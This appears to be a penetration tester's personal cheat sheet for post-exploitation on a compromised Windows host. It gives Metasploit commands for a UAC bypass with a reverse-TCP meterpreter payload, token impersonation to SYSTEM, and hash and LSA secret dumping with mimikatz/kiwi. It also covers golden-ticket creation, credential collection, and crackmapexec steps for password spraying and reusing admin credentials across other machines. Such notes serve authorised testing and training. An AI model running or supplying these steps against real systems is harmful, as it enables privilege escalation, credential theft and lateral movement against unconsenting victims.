From Kali -> Foothold Windows
UAC bypass
meterpreter > use exploit/windows/local/bypassuac_injection_winsxs
meeterpreter > set payload windows/x64/meterpreter/reverse_tcp
meterpreter > set target Windows x64
meterpreter > set SESSION 1
meterpreter > run
# Successfully escalate the privs
# Received a new meterpreter session
Getting privileges of current user
meterpreter > getprivs
Getting UID
meterpreter > getuid
meterpreter > load incognito
List tokens
meterpreter > list_tokens -u
Delegation Tokens Available
======
... (token name)
... (token name)
Impersonate token
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM" (token name)
# UID changed, can check with "getuid"
Dumping hashes (on admin priv escalated)
meterpreter > hashdump
Load mimikatz
meterpreter > load kiwi
Dumping secrets from LSA (or utilizing LSA)
meterpreter > lsa_dump_s (list command starting with "lsa_dump_s")
Dumping clear text password
meterpreter > lsa_dump_secrets
# Received a big part of text with clear text password
meterpreter > shell (switch to a cmd shel)
--
auxiliary/scanner/rdp/rdp_scanner
---
mimkatz # privilege::debug (check priv, require admin)
mimkatz # lsadump::lsa /patch
Enumerate logon password on older windows version
mimkatz # sekurlsa::logon
mimkatz # lsadump (dump content of SAM DB)
The "/patch" option when encountering error
The "/inject" option
The "/name:[name|krbtgt]" option
Create a golden ticket
mimkatz # kerberos::golden /user: /domain: /sid: /krbtgt: /id:
--
mimkatz # sekurlsa::sam -> NTML hashes (meterpreter -> hashdump, lsa_dump_sam, lsa_dump_secrets)
mimkatz # sekurlsa::logonpasswords
--
Use credential collector meterpreter module
meterpreter > use post/windows/gather/credentials/credential_collector
wce64.exe tool (Windows Credential Editor)
---
crackmapexec
- environment/network scan
- smb null scan
- domain users scan
*** when getting first a/c with creds.
- pass pol scan (facilitates password spraying, brute force)
- shares scan (check readable/writable rss)
*** when having an admin a/c
--loggedon-users scan
--lsa
--sam
-d . means local domain
*** once SAM admin, try same creds on other machien on the same network
- try on each other server to get more accounts